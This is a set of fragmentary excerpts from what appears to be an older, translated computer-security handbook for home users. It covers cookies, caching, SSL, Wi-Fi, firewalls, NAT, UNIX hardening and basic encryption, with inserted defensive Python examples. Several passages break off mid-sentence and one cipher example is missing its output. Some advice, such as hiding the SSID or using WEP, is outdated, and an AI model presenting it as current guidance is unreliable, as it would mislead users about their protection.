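            log_odds += math.log(p_spam / p_ham)
        return 1 / (1 + math.exp(-log_odds))


def build_filter():
    f = BayesFilter()
    for msg in HAM:
        f.train(msg, "ham")
    for msg in SPAM:
        f.train(msg, "spam")
    return f


if __name__ == "__main__":
    f = build_filter()
    for name, msg in (("newsletter", NEWSLETTER), ("real spam", REAL_SPAM)):
        print(f"{name}: scanner flags={keyword_scanner(msg)}, "
              f"bayes P(spam)={f.spam_probability(msg):.3f}")
```

The scanner flags the newsletter because it quotes spam phrases, while the trained filter weighs those phrases against the words this recipient's genuine mail normally contains.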
log in to a Web site with your user name and password, the site stores this information in a cookie on your computer. When you return to it, say, a week later, you may be logged in to the site automatically on the basis of the information in that cookie. Cookies also allow Web sites to track what you have done during a session.

Although a cookie can normally be retrieved only by the Web site that set it, the site you are viewing may contain images and other objects that belong to a secondary Web site (called a foreign site or third-party site), and that secondary site can also store and retrieve cookies. Because images can be invisible, you may not notice at all that this has happened. These invisible images can be used for advertising purposes by tracking the Web sites you visit.
[Footnote 86: Suppose sites A, B, C and D all display an invisible image from site Z. When the image is displayed in your browser, Z learns which site referred to it, and then stores cookies to remember which sites you have visited. From then on Z has good information about what interests you and can use that information to send you advertising.]

Rule Thirteen:
Check how cookies are stored on your computer. If you cannot control them (for example when you are using a computer in a public place), do not enter your private information into the computer.

All Web browsers give you some level of control over whether or not to allow cookies. In some cases the browser may distinguish between cookies that are stored on your computer, cookies that disappear when the browser is closed, and those that are stored when you view Web sites and foreign Web sites. Essentially, you can allow all cookies to be stored, prevent them from being stored, or ask the browser to prompt you before storing them. You are never informed when the information stored in a cookie is sent back to the originating Web site.

Cookies can be inspected because they are in text form, but because the information in them is encoded by the originating Web site, they are usually not intelligible. Some browsers allow you to view and delete cookies, and there are third-party programs that also let you manage them.

If you want to control the information a Web site knows about you, you must control when and how cookies are stored on your computer. Note that some Web sites need to store cookies on the user's computer in order to work properly. Generally, if cookies are disabled these sites tell you that they cannot perform or complete the operation.

If you use Web browsers in public places (such as Internet cafes, libraries and schools), be aware that cookies containing your information are stored on them. In many cases the computer's administrator may not have given you enough access to control, view or delete cookies. Your information therefore remains on that computer and may be used by another person who visits the same Web site. If you have logged in to a Web site and your credentials are stored in a cookie, and another user visits the same site, they may automatically be logged in to the site as you. As a result, the Web site may give this user your stored information (such as your name, address and credit card details).

This can be a problem even on a private computer that is used by several people. In these cases
cookies are not only a privacy problem but are also considered a security vulnerability.

The collection of stored pages and images is called the "cache". If you view this Web site again and its page has not changed, the browser may not download the whole page afresh but instead use the cache to display it. In some cases Web pages held in the cache can also be viewed offline (that is, without an Internet connection). This means that whatever you view with the browser has been stored on the computer's hard disk. So if you use the Web for financial transactions, your purchase information, credit cards and bank accounts will be fully readable and recoverable on that computer. Depending on how much you browse and on the size of the cache, these pages and images can remain on the computer for varying lengths of time.

Rule Fourteen:
If your private information has been displayed on a Web page, you must clear the cache when you have finished. If you cannot do this (for example when you are using a public computer), you should not use that computer to exchange confidential personal information.

All browsers allow you to clear the cache (called Temporary Internet Files) from the system, but many computers used in public places do not allow the cache to be controlled or cleared. Although clearing this cache after entering sensitive information is very important, to date no browser has placed an icon on its toolbar that makes it easy to clear the cache with a click.

will be. If part of the Internet connection is wireless, or the ISP at the far end of the connection is not trustworthy, intercepting messages in transit becomes easier, and attention to this becomes much more important.

Browsers and Web servers use encryption to solve this problem. Encryption alters the message, so that it becomes very hard or even impossible for unauthorized people to read the encrypted message (for more details see Appendix 1 of this part). The name of the encryption protocol is "SSL". You can use SSL for the messages you receive. Most browsers show a small padlock image that is open for ordinary transmission and closed for SSL transmissions. In that case the page's URL begins with "https" instead of "http". If it is possible in your country, it is best always to use the strongest encryption method.

Note that this padlock does not indicate whether the message sent from you to the server used SSL for encryption, but it is assumed that if the sent page was encrypted, the returned message is also transmitted encrypted.

SSL works only when the browser knows who it is talking to. This is done with the help of security certificates and digital signatures. In general, if a Web server wants to be trusted, it must obtain a security certificate from a reputable certificate authority. If the authority is to do its job properly, it must verify that the person requesting the certificate is who they claim to be. The authority then digitally signs the certificate, and your browser stores tables for recognizing these certificates.

Sometimes you receive a message from a Web site saying that its digital certificate has expired or belongs to another location. The first case is when the certificate's validity period has recently ended and the Web site must go through the administrative formalities of renewing it. In the second case, too, the site has usually changed its name and the change has not been reflected in its certificate. Nevertheless, if you want an appropriate level of security, in both cases you should end your connection with that site until the problem is somehow resolved.

Is secure transmission enough?
A small padlock has been designed for secure transmission on the Web and shows that the transmission is secure. However, transmission is not the only thing that has to be examined to ensure security. Only a small percentage of fraud or identity theft occurs as a result of insecure transmission. Most problems are cases such as:
• lack of ethics at some Web sites;
• misuse of personal Web sites;
• misuse of personal computers.
The main exception here is "wireless transmission", which will be examined in the next section.

Privacy policies
Many Web sites have published policies for protecting people's privacy. These policies specify what kind of information may be collected at the Web site, what may or may not be done with that data, and how the data must be protected. All Web sites that collect personal or financial information should have an appropriate, published privacy policy.

Wireless transmission
The use of wireless technology is increasing in both developing and developed countries. This technology is usually cheaper than wired technologies, is easier and faster to install on private premises, and has fewer regulatory problems. Nevertheless, wireless technology has two potential problems:
• Information may be stolen in mid-transmission.
• Transmission speed and quality may vary depending on location, weather, time of day, proximity of radio equipment, line transmission speed, installation quality and harmful interference.

Not much can be done about the second category of problems. These are characteristics of wireless technology and are among the costs that must be paid for using wireless communication. The way to counter interception in transit is to use the various encryption methods (for more details on encryption methods see Appendix 1 of this part). If you have a server that supports encryption methods, be sure to use it (for example SSL-based Web sites). If you use POP-based e-mail, you should select the APOP option so that passwords are encrypted before being sent. This feature provides end-to-end security, independent of the transmission medium. If the server does not use encryption, you should be aware of the technology's limitations and, if necessary, decide how you use the connection.
802.11 or Wi-Fi
802.11 is a set of IEEE standards, still under development, for wireless local area networks. 802.11, usually called Wi-Fi, has become popular as a replacement for wired Ethernet for connecting home computers and laptops, and its advantages are its low cost and its relative speed.
• If you want to share your network connection with another person, you must change your network name (SSID) from its default and configure it so that the name is not visible to unauthorized people. Once this is done, only people who know the SSID will be able to see the network connection.
• Its encryption algorithm (WEP) is weak and can easily be broken. Nevertheless, in the absence of better methods you can enable it. Remember that if someone really wants to examine your transmitted information (such as a password), using this method will be very vulnerable. There is, however, a newer encryption method (WPA) that fixes the shortcomings of WEP and is available in newer equipment. Using this method is strongly recommended on Wi-Fi networks.

be used. Many mobile telephone technologies can be eavesdropped on and intercepted, and are therefore not secure.

Long-range links
Long-distance communication, especially for remote areas, is usually provided using wireless technologies. These links can serve several users simultaneously.

Wireless local loop telephones
This technology is used in homes and offices in many countries; it makes low-cost, trouble-free installation of telephone lines possible and does not have the problems of wired infrastructure equipment. On the other hand, unlike copper wires, wireless equipment cannot be stolen along the route and sold; but, as with wired telephones, when a modem is connected to these lines they can carry other kinds of information instead of voice. Wireless technology may be open to eavesdropping. Depending on the local situation, national laws and local regulations, you can ask your ISP to check whether the connection is encrypted.

Other Internet issues

File sharing
room or each be in a different hemisphere of the Earth. File sharing makes it possible for you to access the files on your computer while traveling.

A single computer acting as a file server can be treated as the hard disk of a large number of computers. In that case most of your files are kept on the file server, and you can therefore reach them over the network.

The obvious vulnerability here is that if you can reach your files remotely, other people can too. A less obvious vulnerability is that if you share files with others, you will not be safe from vulnerabilities that may affect their computers. For example, if a computer that has access to your files is infected by a virus, your files may be infected too.

Rule Fifteen:
If you do not use file sharing, disable it. If you need it, limit access to what you really need.

Rule Sixteen:
If you use file sharing, use strong user names and passwords, and restrict access permissions to the minimum with which you can still do your work.

Rule Seventeen:
If you share files with others, make sure they take security seriously.

File-sharing and remote-access facilities allow you to use user names and passwords to control access, and user names and passwords enable you to control what a user does (read, write, create and delete). Many systems can control all of a user's actions. For example, you can restrict the remote-access facility so that it allows files only to be read. In other words, if you do not need write access, you should disable it.

Systems that support certain file-sharing capabilities can also share printers. Although remote access to a printer is not particularly risky, it is better to disable it unless it is necessary. There may be a flaw in remote printer access that allows permissions issued specifically for printing to be used for malicious actions.

Instant messaging
Instant messaging makes it possible for a message typed on one computer to be displayed simultaneously on other computers. Unlike e-mail, here the sender and the recipient must both be connected to the network at the same time. There are various instant-messaging programs, among them MSN Messenger, IRC (Internet Relay Chat), Yahoo Chat, AIM (AOL Instant Messenger) and ICQ (an abbreviation for "I Seek You").

Internet services such as AOL, MSN, Yahoo, Internet game hosts and others each have their own Messenger and Chat. Some of them exchange information with the others and some do not.

Many instant-messaging systems allow the user to choose a name that is displayed with the messages they send, so that others can send messages to them. These names may keep your real identity hidden, although system administrators may be able to identify you through your IP address.
Rule Eighteen:
Instant messaging can be very useful, but use it with full awareness and care.

Instant messaging plays a useful role for several reasons:
• It is easier and faster to use than e-mail and has almost no delay. This

the user is also unaware that these services exist. For example, for several consecutive years some UNIX systems were designed so that any machine running them could act as an unrestricted e-mail hub (unless the user disabled this capability). This allowed spammers to use these machines to distribute spam without many of the machines' owners being aware that such a capability existed.
could identify 65,000 different viruses. August 2003 was an interesting month for the spread of malicious software, because many of the worms released that month exploited one very critical vulnerability in the Windows operating system (Blaster and SoBig were the most widespread of them). Microsoft had released a patch for it a month earlier, but few people had installed it, and for that reason the new worms were able to damage many machines and spread among them rapidly, so much so that new records may have been set. On the busiest day of that month, the Norton virus scanner added about 50 new virus signatures to its list of detectable viruses. Within a month that figure reached about 520.

Firewalls
A firewall examines all activity into or out of the network and, on the basis of its set of rules, allows traffic (that is, the information exchanged over the network) to pass through or stops it. A firewall can be installed as a program on the computer, or it can be a piece of equipment between the computer (or group of computers) and its network connection. Sometimes the firewall is built into other equipment such as routers. This kind of firewall is usually free and pre-installed, and is found in many operating systems.

Rule Twenty-Three:
All computers should be protected by a firewall, which can be installed as software on each computer or put in place as a hardware firewall for the whole local network.

To understand what a firewall does and how rules can be set up to control it, you also need to understand the concept of the TCP/IP protocol, the set of rules that governs all messages sent over the Internet. If you are familiar with TCP/IP you can go on to the next chapter, but if you are not, first read Appendix 2 of this part. Note that even if you do not want to learn these details, you can still use a firewall. What follows is a summary of everything you need to know about TCP/IP:
• Devices connected to the Internet have an IP address of the form 12.222.103.43 which, as you can see, consists of four separate numbers. The Internet uses this address to route messages, and each computer specifies where messages should be sent by giving the destination address in this form.
• On each device, different programs are identified by a port number (like telephone extensions in large companies: there is only one public telephone number, but each room has its own extension).
• The units of information sent to or from a computer are called packets.
• Ignore the words TCP and UDP in the discussion below and do not worry too much about missing the details.

Why do we need a firewall?
If your computer is not connected to a local network or the Internet, you do not need a firewall. As soon as you connect to a network, there is a possibility that attackers will misuse your computer. For example:
• If you use file sharing, printer sharing or other computer services, your computer waits on specific ports (the computer is said to "listen" on that port). Although doing this lets you share your resources with another computer,
another computer anywhere in the world may also be able to see your information.
• If you are able to listen on the file-sharing ports, someone may, because of bugs, be able to send you a cleverly crafted message and through it carry out malicious actions on your computer. Unfortunately this kind of attack has now become very common.
• Even if you are not listening for messages on any port, other computers can still send you large numbers of messages. Although all of them can be ignored, the messages can clog your network connection and prevent you from doing your work (in this case only hardware firewalls can help you).
• If, despite your best efforts, you are infected by a virus, worm or Trojan, all the information on the computer may be sent to the author of the malicious software. This includes data and everything recorded on the victim's computer (including passwords).

How do firewalls work?
A firewall monitors all packets sent to your computer and checks whether they conflict with the rules that have been set. If they do, the packets are blocked. The following rules are best implemented in both software and hardware firewalls:
• Do not allow any packet through on ports 135, 137, 139 and 445 TCP/UDP. These ports are used for file sharing and other kinds of Windows services. By stopping these packets you can be sure that nobody on the Internet can connect to your computer to use these services.
• Do not allow any packet through on ports 135, 137, 139 and 445 TCP/UDP unless its source IP address belongs to one of the computers whose services you wish to use.
• You can define for the firewall a list of trusted computers that do no harm to the network, so that only trusted computers can connect to you. Having done this you can still connect to other computers, such as Web servers on the Internet, but to do so you must be the one who initiates the connection.

Software firewalls use the computer's resources, but have the advantage that they do not examine only the content of the information (along with the addresses and ports of its sender or receiver); they can also check which program sent the message. If an unauthorized program has made a connection with your computer, the firewall can ask your permission before letting it through. A hardware firewall cannot tell which program was used to send a message; but because it is a separate piece of hardware, it does not slow the computer down.

If you have a hardware or software firewall, then as with all other security equipment you must always keep it up to date. Attackers are very inventive, so keeping the tools you use to protect your system up to date is very important.

Private address spaces
The Internet was originally designed so that every computer or device on it had its own address, and so any computer could communicate with any other. Today, for many reasons, global connectivity at this level is not so desirable. There are two main reasons for this:
• Sometimes you want to keep a group of computers separate from the rest, so that they cannot communicate directly with other computers on the Internet.
This is an issue that applies to the computers of some public and private organizations.
• Because IP addresses are allocated across the Internet, your organization may not have enough IP addresses to assign one to every machine. This problem is common in developing countries, where the national Internet came into being several years after the communication networks of developed countries were established.

There are certain IP addresses that are not used on the Internet. These addresses are called "private address spaces" and can be used in the two cases mentioned. Because computers that use private address spaces do not communicate directly with the Internet, they do not need unique addresses. Although different organizations may use the same set of addresses, none of them can see the others, so these identical addresses cause no problem.

There are two ways in which a computer with a private address can communicate with the Internet:

Proxy servers
A proxy server is a special kind of firewall. The server has an address in the private address space but also has a second connection and address for connecting to the Internet. If a user wants to connect to the Internet from a device with an address in the private space, the device sends its message to the proxy server and asks it to deliver the message to the intended destination on the Internet. The server keeps track of the request after sending it out on the Internet, and when the reply comes back it returns it to the requesting device.

Proxy servers can also be used with ordinary IP addresses. They are used to control the type of Internet traffic passing through, or to facilitate communication between user and network. A Web proxy server keeps a copy of requested pages and, if another user requests the same page, sends them the stored copy; this reduces the Internet bandwidth required. This mechanism is called caching.

NAT
NAT sits between the local network and the Internet and, like a proxy server, is connected both to the Internet and to the local network in which private IP addresses are used. When a message is sent from the local network to the Internet through NAT, NAT sends it using its own IP address and makes it appear that the message was sent from a port that is not in use; when the reply arrives, it is passed back to the original computer on the local network. NAT works like a proxy server, but it is used for all kinds of traffic (not just Web traffic) and does not use caching.

Proxy servers and NAT both act like firewalls and protect devices in private address spaces against various kinds of outside attack.

Remote access, management and administration tools
Remote access tools, remote management tools and remote administration tools make it possible to control your computer remotely, over a telephone line or
the Internet. When you connect to your computer this way, it is as if you were sitting at your own machine's keyboard.

Rule Twenty-Four:
If you use remote access facilities to control computers, make sure they have the necessary security (appropriate user names and passwords), so that attackers cannot use these tools against you.

Remote access tools have many important uses, among them the following:
• When you do not have physical access to your office computer, they make it possible to use it. You can thus access the data, applications and network services of your workplace.
• They let you show your computer to a specialist for examination without bringing them to your workplace.
• Many people will be able to use applications that are installed on only one machine.
• System support staff can use them to manage several servers easily.

Remote access tools also make it possible for attackers to do all of the above. In fact there is little functional difference between remote access tools used for the purposes above (such as pcAnywhere) and Trojan back doors (such as Back Orifice or NetBus).

Malware detectors
Suppose you keep your software up to date, scan for viruses and check the files you receive, use strong user names and passwords, and also use a suitable firewall to protect your system. If you are now asked whether, having done all this, you are completely secure, the answer "yes" still cannot be given with one hundred percent certainty. There is always the possibility that you will be harmed by a flaw before a fix for it is released. You may also from time to time do something that cannot be considered completely safe.

"Malware detectors" are programs that examine your computer to find suspicious programs, regardless of how they were installed. Their function sometimes overlaps with that of virus scanners, because both identify malicious software on the disk and check that key system programs have not been secretly modified.

These detectors check browser plug-ins and add-ons and identify anything that harms your system or violates privacy rules. Some of these programs also include tools for removing the malware they find.

Event logging
Event log files are a useful tool for ensuring the security of your computer, but they usually receive little attention. Log files reside on disk and programs can write messages to them. A message is usually written when an event occurs or a problem arises.

Rule Twenty-Five:
Event logging for system functions and applications must be properly enabled.

Examples of events that can be logged are:
• The computer was switched on;
• Someone logged in to the system;
• Someone tried to log in to the system but their password was wrong;
• An e-mail message was received;
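The events listed above are only useful if someone reviews them. The following Python code is an added example, not part of the handbook: it reads a log containing the four kinds of event just listed and reports a run of wrong passwords, and a successful login that follows such a run. The log format, the event names, the thresholds and the sample lines are all assumptions constructed for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log; the format "date time EVENT key=value" is an assumption.
SAMPLE_LOG = """\
2003-08-12 08:01:10 BOOT
2003-08-12 08:03:45 LOGIN_OK user=sara
2003-08-12 08:05:02 MAIL_RECEIVED user=sara
2003-08-12 23:14:01 LOGIN_FAILED user=admin
2003-08-12 23:14:09 LOGIN_FAILED user=admin
2003-08-12 23:14:15 LOGIN_FAILED user=admin
2003-08-12 23:14:31 LOGIN_FAILED user=admin
2003-08-12 23:15:02 LOGIN_OK user=admin
2003-08-13 09:00:00 LOGIN_FAILED user=sara
2003-08-13 09:00:20 LOGIN_OK user=sara
"""


def parse(line):
    """Split one log line into (timestamp, event name, attribute dict)."""
    date, clock, event, *fields = line.split()
    ts = datetime.strptime(f"{date} {clock}", "%Y-%m-%d %H:%M:%S")
    return ts, event, dict(f.split("=", 1) for f in fields)


def review(log_text, threshold=3, window=timedelta(minutes=5)):
    """Return alerts as (timestamp, user, description) tuples."""
    failures = defaultdict(deque)  # user -> times of recent wrong passwords
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, event, attrs = parse(line)
        user = attrs.get("user")
        recent = failures[user]
        # Forget failures that are older than the review window.
        while recent and ts - recent[0] > window:
            recent.popleft()
        if event == "LOGIN_FAILED":
            recent.append(ts)
            if len(recent) == threshold:  # alert once per run of failures
                alerts.append((ts, user, "repeated failed logins"))
        elif event == "LOGIN_OK":
            if len(recent) >= threshold:
                alerts.append(
                    (ts, user, "successful login after repeated failures"))
            recent.clear()
    return alerts


if __name__ == "__main__":
    for ts, user, what in review(SAMPLE_LOG):
        print(ts, user, what)
```

A single mistyped password followed by a normal login, as in the last two sample lines, produces no alert.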
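The firewall rules given earlier under "How do firewalls work?" (block ports 135, 137, 139 and 445 unless the source is a computer you trust, and accept other traffic only when you initiated the connection) can be expressed as a small decision procedure. The following Python code is an added example, not part of the handbook and not the rule syntax of any real firewall product; the class and function names are hypothetical and the addresses and packets are constructed from documentation address ranges.

```python
from ipaddress import ip_address

# Ports the text says to block: Windows file sharing and related services.
WINDOWS_SERVICE_PORTS = frozenset({135, 137, 139, 445})


class Firewall:
    """Inbound filter: deny by default, with the exceptions the text describes."""

    def __init__(self, trusted_hosts=()):
        self.trusted = {ip_address(h) for h in trusted_hosts}
        # Connections this computer started: (remote ip, remote port, local port)
        self.initiated = set()

    def outbound(self, local_port, remote_ip, remote_port):
        """Record a connection we initiate so that its replies are let back in."""
        self.initiated.add((ip_address(remote_ip), remote_port, local_port))

    def inbound(self, remote_ip, remote_port, local_port):
        """Return (allowed, reason) for a packet arriving from the network."""
        remote = ip_address(remote_ip)
        if (remote, remote_port, local_port) in self.initiated:
            return True, "reply to a connection this computer initiated"
        if remote in self.trusted:
            return True, "source is on the trusted list"
        if local_port in WINDOWS_SERVICE_PORTS:
            return False, "Windows service port, source not trusted"
        return False, "unsolicited packet from an untrusted source"


def demo():
    """Run constructed sample traffic through the filter; return the verdicts."""
    fw = Firewall(trusted_hosts=["192.0.2.10"])  # a file server we choose to use
    fw.outbound(local_port=50123, remote_ip="203.0.113.80", remote_port=80)
    packets = [  # (remote ip, remote port, local port)
        ("203.0.113.80", 80, 50123),   # Web server answering our request
        ("192.0.2.10", 49500, 445),    # trusted host using file sharing
        ("198.51.100.7", 40000, 445),  # stranger reaching for file sharing
        ("198.51.100.7", 40001, 135),  # stranger reaching for another service
        ("203.0.113.80", 80, 50999),   # same Web server, nothing was requested
    ]
    return [fw.inbound(*p)[0] for p in packets]


if __name__ == "__main__":
    print(demo())
```

As the text advises, TCP and UDP are not distinguished here; a real firewall tracks the protocol as well as the addresses and ports.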
Windows-based personal computers

Strengths and weaknesses
The Windows operating system on the Intel x86 processor (or its equivalents) is the most widespread computer system designed to date. The capabilities of this operating system and its applications are very attractive from a user's point of view, and a large amount of commercial software, shareware and free software is available for it. Although, as with any other system, real experts are hard to find, there are many specialists with an acceptable level of knowledge for working with these systems. There are also many competitors on the hardware side, which has led to a wide range of products and relatively low prices.

Windows is not in a particularly good position as far as security is concerned. The operating system kernel was not designed with the security issues of network communication in mind, and although many of these have been addressed in newer versions (Windows 2000, Windows XP and so on), the necessary security is still lacking, and the recent changes have been of little help to users of older systems. Until recently Microsoft did not pay much attention to security. That has now changed, particularly as the company has turned its attention to flaws in multimedia software and other vulnerabilities in its operating systems.

The extended functionality of systems and software usually raises the cost of securing them. In many cases, to make the tool easier for novice users to use, systems have

is placed alongside the vulnerabilities mentioned, makes Windows-based systems prone to security problems.

How to protect yourself
Everything in this book applies to Windows systems, and users who are concerned about security should take all of the recommendations given seriously.

Software releases
If you have enough bandwidth, use the Microsoft update site (http://windowsupdate.microsoft.com) to keep your operating system up to date with the latest Service Packs. Otherwise, apply the security patches released for updating Windows (these patches take less bandwidth than Service Packs).

If updating through the Microsoft update site is not possible for you, you can obtain the update packages from the Microsoft download center (http://www.microsoft.com/downloads).

Your ISP or other service providers may be able to download the released updates and distribute them on CD. Although considerable resources are needed for this, a tool for managing Windows updates, in the form of a service called Software Update Services, is available for the Windows 2000 operating system at the following site:
[120] Multi-User
[121] File System
[122] System Services
Part Two: Information Technology Security and Individual Users
[124] Workstation
[125] Single-User
[126] Pre-Installed Security Mechanisms
… refrain from this for day-to-day activities, and for added assurance disable the ability to log in to the system with the root account. When you do have to use this account, use the superuser command (su, or alternatives such as sudo) to switch from the account you are using to the root account.

If you have more than one user on the system, use access control lists [128] so that you can restrict users' access.

Wherever possible, run network services under an account other than root.

Never unpack or compile new software as root. Software is usually compiled in an environment entered with chroot, to protect you against the various kinds of Trojans.

Mounting disks that are used remotely

If you use any of the various remote-access methods to reach a disk remotely (from personal computers or UNIX systems), set suitable passwords for this purpose and, where possible, restrict access to the files that software needs to no more than is required.

Some people assume that because these services exist they ought to be used, even if they lack the technical expertise to manage their security. This is a serious mistake: these services should not be set up on users' workstations without a convincing reason and adequate technical support.

Many network services are started by the inetd or xinetd command. Review the configuration files used by this daemon and disable every service you do not need. Other network services that start at system boot are found in files under /etc/init.d or /etc/rc*.d, or in /etc/rc and /etc/rc.local. Pay particular attention to services that may expose information about the system or its users to others, such as fingerd.

If you have set up an anonymous FTP [129] service, be sure to keep it up to date. Never exchange the /etc/passwd file through the FTP environment. Make sure that the root, uucp and bin accounts, and other accounts that do not belong to a particular user, are listed in /etc/ftpusers, the file that contains the list of users who may not use FTP. Keep an eye on the access permissions of directories [130] and their ownership [131] in the FTP environment. Prevent downloads through the incoming directories and uploads through the outgoing directories, and finally, review your FTP service logs regularly.

Firewall

Every UNIX system should run its own host-based [132] firewall for packet filtering [133]. Use the vendor's documentation to determine whether your system has a firewall and, if it does, how it can be used for this purpose. Firewall configuration tools usually include ipfw, ipchains and iptables. These firewalls must be configured to block all packets by default and to pass only those destined for the services you have chosen.

Malware detectors

Many tools exist for alerting the Unix administrator to malicious software. One of the oldest is Tripwire, which checks whether important system software and other critical files have been covertly modified.
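The inetd and /etc/ftpusers checks recommended above can be scripted. The following is an added example, not code from the handbook; the sample files are constructed, and the list of information-leaking services and the UID threshold for system accounts are assumptions.

```python
"""Audit sketch for the inetd and /etc/ftpusers advice above (added example)."""

# Constructed sample files; on a real host read /etc/inetd.conf, /etc/passwd
# and /etc/ftpusers instead.
SAMPLE_INETD = """\
# service  socket  proto  wait    user    server                 args
ftp        stream  tcp    nowait  root    /usr/sbin/in.ftpd      in.ftpd -l
finger     stream  tcp    nowait  nobody  /usr/sbin/in.fingerd   in.fingerd
#telnet    stream  tcp    nowait  root    /usr/sbin/in.telnetd   in.telnetd
daytime    stream  tcp    nowait  root    internal
"""

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
bin:x:2:2:bin:/bin:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/sh
"""

SAMPLE_FTPUSERS = """\
# accounts that may NOT log in over FTP
root
bin
"""

# Assumption: services that hand out system or user details (the text names fingerd).
INFO_LEAKING = {"finger", "systat", "netstat"}
# Assumption: UIDs below this value are system accounts, not people.
FIRST_HUMAN_UID = 1000


def parse_inetd(text):
    """Return one dict per enabled (uncommented) inetd.conf entry."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 6:
            raise ValueError(f"line {lineno}: expected at least 6 fields")
        service, _socket_type, proto, _wait, user, server = fields[:6]
        # The user field may carry a group as user.group or user:group.
        user = user.split(".")[0].split(":")[0]
        entries.append({"service": service, "proto": proto, "user": user,
                        "server": server, "line": lineno})
    return entries


def audit_inetd(text, needed):
    """Flag enabled services that are unneeded, leak information, or run as root."""
    findings = []
    for entry in parse_inetd(text):
        name = entry["service"]
        if name not in needed:
            findings.append((name, "not needed: disable"))
            continue
        if name in INFO_LEAKING:
            findings.append((name, "exposes system/user information"))
        if entry["user"] == "root":
            findings.append((name, "runs as root"))
    return findings


def missing_from_ftpusers(passwd_text, ftpusers_text):
    """System accounts in passwd that are absent from the FTP deny list."""
    denied = set()
    for line in ftpusers_text.splitlines():
        name = line.split("#", 1)[0].strip()
        if name:
            denied.add(name)
    missing = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) < 7:
            continue  # not a passwd entry
        name, uid = parts[0], int(parts[2])
        if uid < FIRST_HUMAN_UID and name not in denied:
            missing.append(name)
    return missing


if __name__ == "__main__":
    for service, issue in audit_inetd(SAMPLE_INETD, needed={"ftp"}):
        print(f"inetd: {service}: {issue}")
    for account in missing_from_ftpusers(SAMPLE_PASSWD, SAMPLE_FTPUSERS):
        print(f"ftpusers: add {account}")
```

The commented-out telnet entry is correctly ignored, which is the state the text asks for: a service is disabled in inetd.conf by commenting out its line.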
Encoding changes the form of an item so that it meets certain required criteria. The process is reversible, so that the encoded form can later be decoded [136] and returned to its original form.

The encoding process

Suppose you want to send a message that is an ordinary English sentence:

Security is important.

There is, however, a restriction on transmission: you can send only the decimal digits 0, 1, 2, 3, 4, 5, 6, 7, 8, 9. We therefore have to devise a mapping function that can convert what we want to send into decimal numbers and, after transmission, convert it back to its previous state.

For this purpose we use a set of simple rules:

In place of A we put the number 01;
In place of B we put the number 02;
In place of C we put the number 03;

If we put spaces between the digits, it also becomes more readable:

19 05 03 21 18 09 20 25 27 09 19 27 09 13 16 15 18 20 01 14 20 28.

When the message is received, the recipient converts it back to its original state:

S replaces 19;
E replaces 05;
C replaces 03, and this continues until the original sentence is recovered.

Uses of encoding

The main use of encoding, which we turn to next, is in transferring e-mail attachments. E-mail was originally designed for sending English-language text, and the basis of that design was the ASCII code, which had 128 unique characters. These codes were used to represent the 26 letters of the English alphabet in lower and upper case, the 10 digits, some other symbols such as the comma, full stop and bracket, and a number of control keys such as Tab and End.

Many languages, however, have more letters than English. Moreover, programs, word-processing files, pictures and other kinds of files are made up of 8-bit bytes, which together form 256 unique characters, and none of them can be sent by e-mail. To solve this problem the concept of attachments [137] was introduced, in which the file sent along with the e-mail is first encoded so that its content takes the form of standard ASCII characters. This process is similar to the one by which we were able to encode that sentence using numbers alone. As in the previous example, the encoded message here is also longer than the original, but it can be transferred without any particular problem and, once received, decoded and returned to its original form.

Unicode

Unicode is an encoding method for all the characters used in the languages in common use, one that computers can apply uniformly. Further details, as agreed in the Unicode Consortium (http://www.unicode.org), are summarized below:

Fundamentally, computers deal with numbers. They store letters and other symbols by assigning a number to each of them. Before Unicode appeared, hundreds of different encoding systems existed for these conversions, but none of them supported enough letters and symbols; the European Union alone, for example, needed several different encodings to cover all the European languages. Even for a single language such as English, no single encoding was adequate for all the letters, punctuation marks and technical symbols.

The different encoding systems were also incompatible with one another; that is, two different encoding systems might use the same number for two different characters, or different numbers for the same character. Every computer (especially

Unicode assigns a separate number to each character, no matter what the platform, program or language. The Unicode standard was finalized under the leadership of companies such as Apple, HP, IBM, JustSystem, Microsoft, Oracle, SAP, Sun, Sybase, Unisys and ..., and is a fixed standard on all platforms.

Encryption

Encryption resembles encoding in that texts or items are converted into another form in the process. The purpose here is to hide the content of the message.

There are three different methods of encryption:

• Symmetric encryption [138]
• Public-key encryption [139]
• One-way encryption using a hash [140]

Symmetric encryption

Put simply, symmetric encryption is similar to encoding in that all the original letters of the text change their appearance. One of the simplest encryption algorithms is to replace each letter with the letter that follows it. In this method:

B takes the place of A;
C takes the place of B;
D takes the place of C;
........
Y takes the place of X;
Z takes the place of Y;
A takes the place of Z (at the end of the alphabet we return to the first letter).

If we use this algorithm, the example above becomes (ignore the space and the full stop):

[134] Encoding
[135] Encryption
[136] Decoding
Now the message has changed. The recipient reverses the process, replacing each letter with the one before it, and so recovers the original sentence.

Instead of shifting each letter by one position, we can shift the letters by several positions. As long as the recipient knows the size of the shift, the message can be decrypted.

The number of positions by which a letter is shifted is called the encryption key [141]. This number is used both to encrypt the message and to decrypt it. Julius Caesar used this method to send his confidential and secret messages (he had chosen the number 3 as his encryption and decryption key).

With this simple algorithm, if your message is stolen and the thief grasps the general idea of the encryption, the content may be worked out by guessing. If the algorithm is too complex to be found by trying a few shifts, decryption becomes much harder. Until some time ago, many encryption algorithms used this simple shifting method.

Today, mathematical formulas are used for encryption instead of shifting letters. A key is still used, and this key is part of the formula that performs the encryption. To decrypt a message you must use a key. If you do not have the specific key, you can of course try other keys until you find the answer. If the key is limited to the numbers 1 to 10, guessing does not take long. If it lies, say, between 1 and 100, it may take a little longer. Today, keys are usually 128-bit binary numbers. That amounts to approximately

340,000,000,000,000,000,000,000,000,000,000,000,000

different choices, which makes guessing the right key almost impossible.

Symmetric encryption is used when the sender and the recipient can use the same key (in which case they must have agreed on a specific key). This method is used to encrypt a message when you want to move information from one place to another, for example over wireless communications, or when you want to encrypt the information on a disk so that others cannot read it. In the latter cases, if the key is lost your information is certainly lost as well.

Public-key encryption

